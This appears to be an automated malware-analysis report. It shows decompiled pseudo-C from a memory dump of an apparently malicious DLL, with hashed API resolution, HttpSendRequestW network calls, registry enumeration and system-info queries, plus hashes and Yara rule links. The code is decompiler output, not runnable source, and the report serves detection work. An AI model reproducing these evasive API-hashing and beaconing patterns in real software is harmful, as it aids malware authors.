Instruction Fuzzy Hash: 6B61E63150C3019FD708CFA5C99079BB7E9AFC4758F148A6DE4599B250EB30DC85CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA0430F, Relevance: 1.7, APIs: 1, Instructions: 162
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6EA0430F(void* __eax, intOrPtr __ebx, void* __esi, void* __ebp, char _a4, struct _SYSTEM_INFO _a344, intOrPtr _a356, intOrPtr _a360, intOrPtr _a364, short _a372, intOrPtr _a380, char _a384, char _a388, char _a400, char _a404, char _a408) {
				char _v0;
				void* _v4;
				char _v16;
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t48;
				intOrPtr _t54;
				intOrPtr _t56;
				intOrPtr _t59;
				intOrPtr _t64;
				void* _t69;

				_t47 = __ebx;
				if(__eax == 0) {
					L6EA19510( &_a4);
					if(_a408 != 0) {
						E6EA1BE30( &_a404, __esi);
					}
				} else {
					__edx =  *0x6ea2b1f4; // 0xba1340
					if(__edx == 0xc139578) {
						 *0x6ea2b1f4 = 0;
						L26:
						__eax = 0x3ab94787;
						_push(0x3ab94787);
						_v4 = L6EA07564(0x3ab94787);
						if(_v4 == 0) {
							__ecx = 0x3ab94787;
							__eax = E6EA06C50(0x3ab94787);
							if(__al != 0) {
								__eax = 0x3ab94787;
								_push(0x3ab94787);
								 *__esp = L6EA07564(0x3ab94787);
							}
						}
						if(_v4 == 0) {
							L42:
							__ecx =  &_v0;
							__eax = L6EA19510( &_v0);
							if(_a404 != 0) {
								__ecx =  &_a400;
								__eax = E6EA1BE30( &_a400, __esi);
							}
							goto L1;
						} else {
							__esp = __esp + 0xfffffff8;
							__edx = 0xc4b8bd35;
							__eax = _v4;
							__edx = E6EA067C8(_v4, 0xc4b8bd35);
							L29:
							if(__edx == 0) {
								goto L42;
							}
							 *__edi & 0x000000ff = ( *__edi & 0x000000ff) - 1;
							__eax =  *__edx( *__esi, ( *__edi & 0x000000ff) - 1);
							if(__eax == 0) {
								goto L42;
							}
							__eax =  *__eax;
							if(__eax == 0) {
								__esi = 1;
							} else {
								if(__eax == 0x1000) {
									__esi = 2;
								} else {
									if(__eax == 0x2100) {
										__esi = 4;
									} else {
										if(__eax == 0x2000) {
											__esi = 3;
										} else {
											if(__eax == 0x3000) {
												__esi = 5;
											} else {
												if(__eax != 0x4000) {
													__esi = 7;
													__esi =  !=  ? __ebx : 7;
												} else {
													__esi = 6;
												}
											}
										}
									}
								}
							}
							__ecx =  &_v16;
							__eax = L6EA19510( &_v16);
							if(_a388 != 0) {
								__ecx =  &_a384;
								__eax = E6EA1BE30( &_a384, __esi);
							}
							L2:
							_t35 =  *0x6ea2b1f0; // 0xba0528
							 *((intOrPtr*)(_t35 + 0x2c)) = _t64;
							_t56 =  *0x6ea2b1f4; // 0xba1340
							if(_t56 == 0xc139578) {
								 *0x6ea2b1f4 = 0;
								L9:
								_push(0xa1310f65);
								_t48 = L6EA07564(0xa1310f65);
								if(_t48 == 0) {
									if(E6EA06C50(0xa1310f65) != 0) {
										_push(0xa1310f65);
										_t48 = L6EA07564(0xa1310f65);
									}
								}
								if(_t48 == 0) {
									goto L14;
								} else {
									_t69 = _t69 + 0xfffffff8;
									_t59 = E6EA067C8(_t48, 0x4e85f18d);
									goto L12;
								}
							} else {
								if(_t56 == 0) {
									goto L9;
								} else {
									goto L5;
								}
								do {
									L5:
									_t54 = _t47;
									_t45 = _t54;
									while( *((intOrPtr*)(_t45 + _t56 + 8)) != 0x4e85f18d) {
										_t54 = _t54 + 1;
										_t45 = _t45 + 0x18;
										if(_t54 < 0x10) {
											continue;
										}
										goto L8;
									}
									_t59 =  *((intOrPtr*)(_t45 + _t56 + 0x14));
									if(_t59 != 0) {
										L12:
										if(_t59 != 0) {
											GetSystemInfo( &_a344);
										}
										L14:
										_t39 =  *0x6ea2b1f0; // 0xba0528
										 *((short*)(_t39 + 0xe)) = _a372;
										 *((intOrPtr*)(_t39 + 0x10)) = _a356;
										 *((intOrPtr*)(_t39 + 0x14)) = _a360;
										 *((intOrPtr*)(_t39 + 0x18)) = _a364;
										 *((intOrPtr*)(_t39 + 0x1c)) = _a380;
										return _t39;
									} else {
										goto L9;
									}
									L8:
									asm("o16 nop [eax+eax]");
									_t4 = _t56 + 0x180; // 0xba8e68
									_t56 =  *_t4;
								} while (_t56 != 0);
								goto L9;
							}
						}
					}
					if(__edx == 0) {
						goto L26;
					} else {
						goto L22;
					}
					do {
						L22:
						__ecx = __ebx;
						__eax = __ecx;
						while( *((intOrPtr*)(__eax + __edx + 8)) != 0xc4b8bd35) {
							__ecx = __ecx + 1;
							__eax = __eax + 0x18;
							if(__ecx < 0x10) {
								continue;
							}
							goto L25;
						}
						__edx =  *((intOrPtr*)(__eax + __edx + 0x14));
						if(__edx != 0) {
							goto L29;
						}
						goto L26;
						L25:
						asm("o16 nop [eax+eax]");
						_t20 = __edx + 0x180; // 0xba8e68
						__edx =  *_t20;
					} while (__edx != 0);
					goto L26;
				}
				L1:
				_t64 = _t47;
				goto L2;
			}

0x6ea0430f
0x6ea04313
0x6ea0444c
0x6ea04459
0x6ea04466
0x6ea04466
0x6ea04319
0x6ea04319
0x6ea04325
0x6ea044f6
0x6ea0435a
0x6ea0435a
0x6ea0435f
0x6ea04365
0x6ea0436c
0x6ea044c0
0x6ea044c5
0x6ea044cc
0x6ea044d2
0x6ea044d7
0x6ea044dd
0x6ea044dd
0x6ea044cc
0x6ea04376
0x6ea04420
0x6ea04420
0x6ea04424
0x6ea04431
0x6ea04437
0x6ea0443e
0x6ea0443e
0x00000000
0x6ea0437c
0x6ea0437c
0x6ea0437f
0x6ea04384
0x6ea0438d
0x6ea0438f
0x6ea04391
0x00000000
0x00000000
0x6ea0439a
0x6ea0439e
0x6ea043a2
0x00000000
0x00000000
0x6ea043a4
0x6ea043a8
0x6ea044b6
0x6ea043ae
0x6ea043b3
0x6ea044ac
0x6ea043b9
0x6ea043be
0x6ea044a2
0x6ea043c4
0x6ea043c9
0x6ea04498
0x6ea043cf
0x6ea043d4
0x6ea043f3
0x6ea043d6
0x6ea043db
0x6ea043e4
0x6ea043ee
0x6ea043dd
0x6ea043dd
0x6ea043dd
0x6ea043db
0x6ea043d4
0x6ea043c9
0x6ea043be
0x6ea043b3
0x6ea043f8
0x6ea043fc
0x6ea04409
0x6ea0440f
0x6ea04416
0x6ea04416
0x6ea04042
0x6ea04042
0x6ea04047
0x6ea0404a
0x6ea04056
0x6ea041cf
0x6ea0408b
0x6ea04090
0x6ea04096
0x6ea0409a
0x6ea041a6
0x6ea041b1
0x6ea041b7
0x6ea041b7
0x6ea041a6
0x6ea040a2
0x00000000
0x6ea040a4
0x6ea040ab
0x6ea040b3
0x00000000
0x6ea040b3
0x6ea0405c
0x6ea0405e
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea04060
0x6ea04060
0x6ea04060
0x6ea04062
0x6ea04064
0x6ea04072
0x6ea04073
0x6ea04079
0x00000000
0x00000000
0x00000000
0x6ea04079
0x6ea041be
0x6ea041c4
0x6ea040b5
0x6ea040b7
0x6ea040c1
0x6ea040c1
0x6ea040c3
0x6ea040c3
0x6ea040eb
0x6ea040ef
0x6ea040f2
0x6ea040f5
0x6ea040f8
0x6ea04107
0x6ea041ca
0x00000000
0x6ea041ca
0x6ea0407b
0x6ea0407b
0x6ea04081
0x6ea04081
0x6ea04087
0x00000000
0x6ea04060
0x6ea04056
0x6ea04376
0x6ea0432d
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0432f
0x6ea0432f
0x6ea0432f
0x6ea04331
0x6ea04333
0x6ea04341
0x6ea04342
0x6ea04348
0x00000000
0x00000000
0x00000000
0x6ea04348
0x6ea044e5
0x6ea044eb
0x00000000
0x00000000
0x00000000
0x6ea0434a
0x6ea0434a
0x6ea04350
0x6ea04350
0x6ea04356
0x00000000
0x6ea0432f
0x6ea04040
0x6ea04040
0x00000000

APIs

GetSystemInfo.KERNELBASE(?), ref: 6EA040C1

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 69773c655fde57d46b43e20988407c19f94d228891c17fa32f6c597d9fbbca10
Instruction ID: 3fd5cfd255e7b225cbdc09359932214400649a9c8400abb4cbf461b3640fbad7
Opcode Fuzzy Hash: 69773c655fde57d46b43e20988407c19f94d228891c17fa32f6c597d9fbbca10
Instruction Fuzzy Hash: C5510730A083428FE7548E99E5A07EE7296BBA531CF19857DC458A7295DB38CCC2C74A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA23820, Relevance: 1.7, APIs: 1, Instructions: 151
networkCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E6EA23820(intOrPtr* __ecx) {
				void* __edi;
				void* __esi;
				intOrPtr _t39;
				void* _t40;
				intOrPtr _t43;
				void* _t44;
				void* _t48;
				long _t52;
				int _t53;
				intOrPtr _t59;
				void* _t67;
				intOrPtr* _t95;
				intOrPtr _t102;
				intOrPtr _t104;
				void* _t105;
				intOrPtr* _t107;
				void* _t109;
				intOrPtr* _t110;

				_t110 = _t109 - 0x60;
				_t107 = __ecx;
				_t39 =  *((intOrPtr*)(__ecx + 8));
				if(_t39 == 0 || _t39 == 0xffffffff) {
					_t40 = 1;
				} else {
					_t40 = 0;
				}
				if(_t40 != 0) {
					L26:
					_push(0);
					E6EA19350( *((intOrPtr*)(_t110 + 0x78)));
					return  *((intOrPtr*)(_t110 + 0x74));
				} else {
					_t43 =  *((intOrPtr*)(_t107 + 0x10));
					if(_t43 == 0 || _t43 == 0xffffffff) {
						_t44 = 1;
					} else {
						_t44 = 0;
					}
					if(_t44 != 0) {
						goto L26;
					} else {
						_t75 = _t107 + 0x28;
						E6EA17660(_t107 + 0x28, _t110 + 0x3c, 0x6ea29424);
						E6EA087A0(_t110 + 0x44);
						_t48 = L6EA015C0(0xd27f045a, 0x336e58dc);
						_t98 = _t48;
						if(_t48 != 0) {
							 *_t110 =  *((intOrPtr*)(_t107 + 0x10));
							 *((intOrPtr*)(_t110 + 0xc)) =  *((intOrPtr*)(_t110 + 0x44));
							_t102 =  *((intOrPtr*)(_t107 + 0x28));
							 *(_t110 + 8) = E6EA10180( *((intOrPtr*)(_t110 + 0x44)), 0x7fffffff, _t102);
							if(E6EA19650( *((intOrPtr*)(_t110 + 0x78))) != 0) {
								 *((intOrPtr*)(_t110 + 4)) = E6EA19640( *((intOrPtr*)(_t110 + 0x7c)), 0);
							} else {
								 *((intOrPtr*)(_t110 + 4)) = 0;
							}
							_t52 = E6EA19650( *((intOrPtr*)(_t110 + 0x78)));
							_t103 =  !=  ?  *((void*)(_t110 + 0x18)) : _t102;
							_t53 = HttpSendRequestW( *(_t110 + 0x10),  !=  ?  *((void*)(_t110 + 0x18)) : _t102,  *(_t110 + 0x10),  *(_t110 + 8), _t52); // executed
							if(_t53 == 0) {
								_t104 = E6EA07F00();
								L6EA17560(_t75, _t98, _t104);
								if(_t104 != 0) {
									goto L12;
								} else {
									goto L17;
								}
							} else {
								L6EA17560(_t75, _t98, _t103);
								L17:
								 *(_t110 + 0x50) = 4;
								_t95 = L6EA015C0(0xd27f045a, 0xcedbd48c);
								if(_t95 == 0) {
									_t59 = 0x7f;
									goto L24;
								} else {
									_t105 = _t110 + 0x50;
									_push(0);
									_push(_t105);
									_push(_t110 + 0x4c);
									_push(0x20000013);
									_push( *((intOrPtr*)(_t107 + 0x10)));
									if( *_t95() == 0) {
										_t59 = E6EA07F00();
										if(_t59 != 0) {
											L24:
											 *_t107 = _t59;
											E6EA08CA0(_t110 + 0x44);
											goto L25;
										} else {
											goto L19;
										}
									} else {
										L19:
										 *((intOrPtr*)(_t107 + 0x34)) =  *((intOrPtr*)(_t110 + 0x4c));
										E6EA08810(_t110 + 0x38, 0x2800);
										 *(_t110 + 0x50) =  *(_t110 + 0x38) >> 1;
										_t67 = L6EA015C0(0xd27f045a, 0xcedbd48c);
										if(_t67 == 0) {
											 *_t107 = 0x7f;
											E6EA08CA0(_t110 + 0x34);
											E6EA08CA0(_t110 + 0x44);
											goto L25;
										} else {
											_push(0);
											_push(_t105);
											_push( *((intOrPtr*)(_t110 + 0x3c)));
											_push(0x14);
											_push( *((intOrPtr*)(_t107 + 0x10)));
											asm("int3");
											return _t67;
										}
									}
								}
							}
						} else {
							_t104 = 0x7f;
							L6EA17560(_t75, _t98, 0x7f);
							L12:
							 *_t107 = _t104;
							E6EA08CA0(_t110 + 0x44);
							L25:
							E6EA10B10(_t110 + 0x3c);
							goto L26;
						}
					}
				}
			}

0x6ea23824
0x6ea23827
0x6ea23829
0x6ea2382e
0x6ea23839
0x6ea23835
0x6ea23835
0x6ea23835
0x6ea23840
0x6ea23bba
0x6ea23bba
0x6ea23bc0
0x6ea23bd0
0x6ea23846
0x6ea23846
0x6ea2384b
0x6ea23856
0x6ea23852
0x6ea23852
0x6ea23852
0x6ea2385d
0x00000000
0x6ea23863
0x6ea23863
0x6ea23872
0x6ea2387f
0x6ea2388e
0x6ea23893
0x6ea23897
0x6ea238c2
0x6ea238c5
0x6ea238c9
0x6ea238d1
0x6ea238e0
0x6ea23ca0
0x6ea238e6
0x6ea238e6
0x6ea238e6
0x6ea238f2
0x6ea23902
0x6ea2390c
0x6ea23910
0x6ea23c7f
0x6ea23c83
0x6ea23c8a
0x00000000
0x6ea23c90
0x00000000
0x6ea23c90
0x6ea23916
0x6ea23918
0x6ea2391d
0x6ea2391d
0x6ea23934
0x6ea23938
0x6ea23ba0
0x00000000
0x6ea2393e
0x6ea2393e
0x6ea23946
0x6ea23948
0x6ea23949
0x6ea2394a
0x6ea2394f
0x6ea23956
0x6ea23c68
0x6ea23c6f
0x6ea23ba5
0x6ea23ba5
0x6ea23bac
0x00000000
0x6ea23c75
0x00000000
0x6ea23c75
0x6ea2395c
0x6ea2395c
0x6ea23965
0x6ea2396c
0x6ea23977
0x6ea23985
0x6ea2398c
0x6ea23b89
0x6ea23b90
0x6ea23b99
0x00000000
0x6ea23992
0x6ea23992
0x6ea23994
0x6ea23995
0x6ea23999
0x6ea2399b
0x6ea2399e
0x6ea2399f
0x6ea2399f
0x6ea2398c
0x6ea23956
0x6ea23938
0x6ea23899
0x6ea2389b
0x6ea238a0
0x6ea238a5
0x6ea238a5
0x6ea238ac
0x6ea23bb1
0x6ea23bb5
0x00000000
0x6ea23bb5
0x6ea23897
0x6ea2385d

APIs

HttpSendRequestW.WININET(D27F045A,?,D27F045A,?,00000000,D27F045A,336E58DC,?), ref: 6EA2390C

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: HttpRequestSend
String ID:
API String ID: 360639707-0
Opcode ID: 603eb23db2640bd5964ec589c11f6b92026ed9c222871acf28681a8fb7b97d8e
Instruction ID: 98c2eec56301a80d93644ca54f550298a09566917905d0adfef0a824552628b1
Opcode Fuzzy Hash: 603eb23db2640bd5964ec589c11f6b92026ed9c222871acf28681a8fb7b97d8e
Instruction Fuzzy Hash: 3E51B7305082029FE7409FA4CD50B9F7BF9AF82398F14493DB9959B290EB31DC88CB59

Uniqueness

Uniqueness Score: -1.00%

Function 6EA1C580, Relevance: 1.6, APIs: 1, Instructions: 98
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EA1C580(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v0;
				intOrPtr _v4;
				int _v20;
				char _v28;
				int* _v32;
				int* _v36;
				char _v40;
				char _v48;
				char _v303;
				void* __edi;
				void* __esi;
				long _t25;
				signed int _t33;
				char _t45;
				int _t62;
				intOrPtr _t63;
				char* _t64;
				char* _t66;

				_v40 = 0;
				_t62 = 0;
				_v36 = 0;
				_t63 = __ecx;
				_v32 = 0;
				_t64 = _t66;
				while(1) {
					_v20 = 0x105;
					if(L6EA015C0(0x3ab94787, 0x31fb9d90) == 0) {
						goto L3;
					}
					_t25 = RegEnumValueA( *(_t63 + 4), _t62, _t64,  &_v20, 0, 0, 0, 0); // executed
					if(_t25 == 0) {
						goto L3;
					}
					_t45 = _v40;
					_t26 = 0;
					if(_t45 <= 0) {
						L9:
						L6EA10930(_a4, _t26, _t26);
						L6EA17560( &_v48, _t62, _t63);
						return _v4;
					} else {
						_t63 = _t45;
						_t65 = 0;
						_t62 =  &_v28;
						while(1) {
							E6EA11240(E6EA17600( &_v40, _t65), _t62); // executed
							_t40 = _v36;
							_t33 = E6EA1D620(_t40, E6EA16040(_v36, 0x7fffffff));
							E6EA10B10(_t62);
							if((_t33 ^ 0x38ba5c7b) == _v0) {
								break;
							}
							_t65 =  &_v303;
							if( &_v303 < _t63) {
								continue;
							} else {
								_t26 = 0;
								goto L9;
							}
							goto L11;
						}
						E6EA10750(_v0, E6EA17600( &_v40, _t65));
						L6EA17560( &_v48, _t62, _t63);
						return _v4;
					}
					L11:
					L3:
					E6EA137E0( &_v40, _t64, _v40);
					_t62 = _t62 + 1;
				}
			}

0x6ea1c58e
0x6ea1c595
0x6ea1c597
0x6ea1c59e
0x6ea1c5a0
0x6ea1c5a7
0x6ea1c5aa
0x6ea1c5aa
0x6ea1c5c8
0x00000000
0x00000000
0x6ea1c5db
0x6ea1c5df
0x00000000
0x00000000
0x6ea1c5f8
0x6ea1c5ff
0x6ea1c603
0x6ea1c662
0x6ea1c66b
0x6ea1c677
0x6ea1c68d
0x6ea1c605
0x6ea1c607
0x6ea1c609
0x6ea1c60b
0x6ea1c612
0x6ea1c622
0x6ea1c627
0x6ea1c63e
0x6ea1c647
0x6ea1c659
0x00000000
0x00000000
0x6ea1c65b
0x6ea1c65e
0x00000000
0x6ea1c660
0x6ea1c660
0x00000000
0x6ea1c660
0x00000000
0x6ea1c65e
0x6ea1c6a7
0x6ea1c6b3
0x6ea1c6c9
0x6ea1c6c9
0x00000000
0x6ea1c5e1
0x6ea1c5f0
0x6ea1c5f5
0x6ea1c5f5

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,?,00000000,00000000,00000000,00000000,3AB94787,31FB9D90,?,?,3AB94787,31FB9D90), ref: 6EA1C5DB

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: 71b1a84cdbfb9666a2904b00dc10ff6c6848b6122441b50c3cd9c2af10e49e24
Instruction ID: ec4a5bd2c0a976b2558b9bfbd747e8fb461f70bce437a8b1d57b2e05c8404bf8
Opcode Fuzzy Hash: 71b1a84cdbfb9666a2904b00dc10ff6c6848b6122441b50c3cd9c2af10e49e24
Instruction Fuzzy Hash: 4431CD3120C2445BC379DAA8D990AEFB3EDABD9354F104D3DA09987240EF715D858BAA

Uniqueness

Uniqueness Score: -1.00%

Function 6EA1C405, Relevance: 1.6, APIs: 1, Instructions: 83
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E6EA1C405(intOrPtr __eax, void* __edi, intOrPtr __ebp, void* _a8, int _a12, void* _a16, void* _a20, void** _a28, void** _a32, void** _a36, char _a40, unsigned int _a44, char _a48, void** _a52, void* _a64, void* _a68) {
				unsigned int _v0;
				void* _v4;
				unsigned int _v8;
				void* _v20;
				void* _v28;
				void* _t41;
				intOrPtr* _t42;
				void** _t45;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t51;

				_t51 = __ebp;
				_t49 = __eax;
				if(__eax != 0) {
					_t42 = _a16;
					goto L1;
				} else {
					do {
						__edx =  &_a48;
						__ecx =  &_a40;
						__eax = E6EA0A0D0( &_a40,  &_a48);
						__edx = _a44;
						__ecx =  &_a52;
						__eax = E6EA083B0( &_a52);
						__esi = _a52;
						__ecx = __esi;
						__edx = 0x7fffffff;
						__eax = E6EA16040(__esi, 0x7fffffff);
						__ecx = __esi;
						__edx = __eax;
						__esi = __eax;
						__ecx =  &_a52;
						__eax = E6EA10B10( &_a52);
						if(__esi != __edi) {
							__ecx =  &_a48;
							__eax = E6EA08CA0( &_a48);
							__ebx = __ebx + 1;
							goto L12;
						} else {
							__edi = _a36;
							__ecx =  &_a48;
							__esi =  *(__ecx - 0x10);
							__eax = E6EA08CA0(__ecx);
							if(__edi != 0) {
								__ecx =  *(__esp + 0x1c);
								__eax = E6EA096D0( *(__esp + 0x1c), 0x5c);
							}
							__ecx =  *(__esp + 0x20);
							__eax = E6EA10220( *(__esp + 0x20), _a40, 0);
							_a12 = 0;
							__eax = L6EA015C0(0x3ab94787, 0xd5493f9);
							__edx = __eax;
							if(__eax == 0) {
								__edx = 0;
							} else {
								__eax =  &_a20;
								__ecx =  *(__eax - 0xc);
								__ecx =  ==  ?  *((void*)(__eax - 0x10)) :  *(__eax - 0xc);
								__ebx = __eax[1];
								__eax = RegOpenKeyExW( *(__esp + 0x68),  *(__eax[1]), 0, __ecx, __eax); // executed
								__edx = __eax;
							}
							__ebx = _a20;
							if(__ebx == 0 || __ebx == 0xffffffff) {
								L34:
								__ebx = _a16;
								__esi = __edx;
								L1:
								if( *((char*)(_t42 + 8)) == 0) {
									L9:
									 *((intOrPtr*)(_t42 + 4)) = _t51;
									 *((char*)(_t42 + 8)) = 1;
									E6EA08CA0( &_a40);
									 *_t42 = _t49;
									return _t49;
								} else {
									_t48 =  *((intOrPtr*)(_t42 + 4));
									if(_t48 == 0 || _t48 == 0xffffffff) {
										_t45 = 1;
									} else {
										_t45 = 0;
									}
									if(_t45 != 0) {
										goto L9;
									} else {
										_t41 = L6EA015C0(0x3ab94787, 0x91935d4e);
										if(_t41 == 0) {
											goto L9;
										} else {
											_push(_t48);
											asm("int3");
											return _t41;
										}
									}
								}
							} else {
								if(__esi == 0) {
									L30:
									__edi =  &(__edi[0]);
									__ebp = __ebx;
									if(__edi < _a28) {
										__esi = 1;
										__eax = __edi * 4;
										__ecx =  *(__esp + 0x58);
										__eax = E6EA19640( *(__esp + 0x58), __edi * 4);
										__eax =  *__eax;
										__ebx = 0;
										__eax = __eax ^ 0x38ba5c7b;
										_a32 = __edi;
										__edi = __eax;
										_a28 = 1;
										goto L12;
									} else {
										goto L34;
									}
								} else {
									if(__ebp == 0 || __ebp == 0xffffffff) {
										__eax = 1;
									} else {
										__eax = 0;
									}
									if(__eax != 0) {
										goto L30;
									} else {
										_v0 = __edx;
										__eax = L6EA015C0(0x3ab94787, 0x91935d4e);
										__edx = _v8;
										if(__eax == 0) {
											goto L30;
										} else {
											_push(__ebp);
											_v0 = __edx;
											asm("int3");
											return __eax;
										}
									}
								}
							}
						}
						goto L35;
						L12:
						__eax = L6EA015C0(0x3ab94787, 0xf561ae8b);
					} while (__eax == 0);
					__edx = _a44;
					__edx = _a44 >> 1;
					_push(_a44 >> 1);
					_push(_a40);
					_push(__ebx);
					_push(__ebp);
					asm("int3");
					return __eax;
				}
				L35:
			}

0x6ea1c405
0x6ea1c405
0x6ea1c409
0x6ea1c52e
0x00000000
0x6ea1c40f
0x6ea1c40f
0x6ea1c40f
0x6ea1c414
0x6ea1c418
0x6ea1c41d
0x6ea1c421
0x6ea1c425
0x6ea1c42a
0x6ea1c42e
0x6ea1c430
0x6ea1c435
0x6ea1c43a
0x6ea1c43c
0x6ea1c443
0x6ea1c445
0x6ea1c449
0x6ea1c450
0x6ea1c51f
0x6ea1c523
0x6ea1c528
0x00000000
0x6ea1c456
0x6ea1c456
0x6ea1c45a
0x6ea1c45e
0x6ea1c461
0x6ea1c468
0x6ea1c46c
0x6ea1c470
0x6ea1c470
0x6ea1c47b
0x6ea1c47f
0x6ea1c484
0x6ea1c496
0x6ea1c49b
0x6ea1c49f
0x6ea1c4c3
0x6ea1c4a1
0x6ea1c4a5
0x6ea1c4a9
0x6ea1c4ac
0x6ea1c4b4
0x6ea1c4bd
0x6ea1c4bf
0x6ea1c4bf
0x6ea1c4c5
0x6ea1c4cb
0x6ea1c537
0x6ea1c537
0x6ea1c53b
0x6ea1c337
0x6ea1c33b
0x6ea1c36c
0x6ea1c36c
0x6ea1c373
0x6ea1c377
0x6ea1c37c
0x6ea1c387
0x6ea1c33d
0x6ea1c33d
0x6ea1c342
0x6ea1c34d
0x6ea1c349
0x6ea1c349
0x6ea1c349
0x6ea1c354
0x00000000
0x6ea1c356
0x6ea1c360
0x6ea1c367
0x00000000
0x6ea1c369
0x6ea1c369
0x6ea1c36a
0x6ea1c36b
0x6ea1c36b
0x6ea1c367
0x6ea1c354
0x6ea1c4d2
0x6ea1c4d4
0x6ea1c510
0x6ea1c510
0x6ea1c511
0x6ea1c517
0x6ea1c3ba
0x6ea1c3bf
0x6ea1c3c7
0x6ea1c3cb
0x6ea1c3d0
0x6ea1c3d2
0x6ea1c3d4
0x6ea1c3d9
0x6ea1c3dd
0x6ea1c3df
0x00000000
0x6ea1c51d
0x00000000
0x6ea1c51d
0x6ea1c4d6
0x6ea1c4d8
0x6ea1c4e3
0x6ea1c4df
0x6ea1c4df
0x6ea1c4df
0x6ea1c4ea
0x00000000
0x6ea1c4ec
0x6ea1c4f6
0x6ea1c4fa
0x6ea1c4ff
0x6ea1c504
0x00000000
0x6ea1c506
0x6ea1c506
0x6ea1c507
0x6ea1c50b
0x6ea1c50c
0x6ea1c50c
0x6ea1c504
0x6ea1c4ea
0x6ea1c4d4
0x6ea1c4cb
0x00000000
0x6ea1c3e3
0x6ea1c3ed
0x6ea1c3f2
0x6ea1c3f6
0x6ea1c3fa
0x6ea1c3fc
0x6ea1c3fd
0x6ea1c401
0x6ea1c402
0x6ea1c403
0x6ea1c404
0x6ea1c404
0x00000000

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,00000000,3AB94787,0D5493F9,?,00000000), ref: 6EA1C4BD

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 0e37b628d0b4e674bacbd8cf169e758a79634cf178c09426afabd7f642685cea
Instruction ID: db9e4369e23be70f04471d6c224f9202c366c5234b43d435719065f08ca5aa23
Opcode Fuzzy Hash: 0e37b628d0b4e674bacbd8cf169e758a79634cf178c09426afabd7f642685cea
Instruction Fuzzy Hash: B421873164C3019BC749CEA4C994AAFB3E5AFC4758F144E2CF5655B290EB30EC858B8A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA01030, Relevance: 1.5, APIs: 1, Instructions: 36
memoryCOMMON

Download Yara Rule

C-Code - Quality: 33%

			E6EA01030() {
				void* _v20;
				void* _t4;
				intOrPtr* _t9;
				void* _t11;

				if( *0x6ea2b1e0 == 0xe99c89bf) {
					_t9 = L6EA015C0(0x588ab3ea, 0xc0b67de0);
					 *0x6ea2b1e4 = L6EA015C0(0x588ab3ea, 0x82d274c4);
					if( *0x6ea2b1e0 == 0xe99c89bf) {
						 *_t9(2, 0, 0, 0, 0, 0); // executed
						 *0x6ea2b1e0 = 0;
					}
				}
				_t4 = L6EA015C0(0x588ab3ea, 0x996e050f);
				if(_t4 == 0) {
					return 0;
				} else {
					_push( *((intOrPtr*)(_t11 + 8)));
					_push(8);
					_push( *0x6ea2b1e0);
					asm("int3");
					return _t4;
				}
			}

0x6ea0103b
0x6ea01073
0x6ea01084
0x6ea01093
0x6ea0109e
0x6ea010a0
0x6ea010a0
0x6ea01093
0x6ea01047
0x6ea0104e
0x6ea01063
0x6ea01050
0x6ea01050
0x6ea01054
0x6ea01056
0x6ea0105c
0x6ea0105d
0x6ea0105d

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,588AB3EA,82D274C4,588AB3EA,C0B67DE0,?,6EA08864,00000000,00000000,00000000,?), ref: 6EA0109E

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
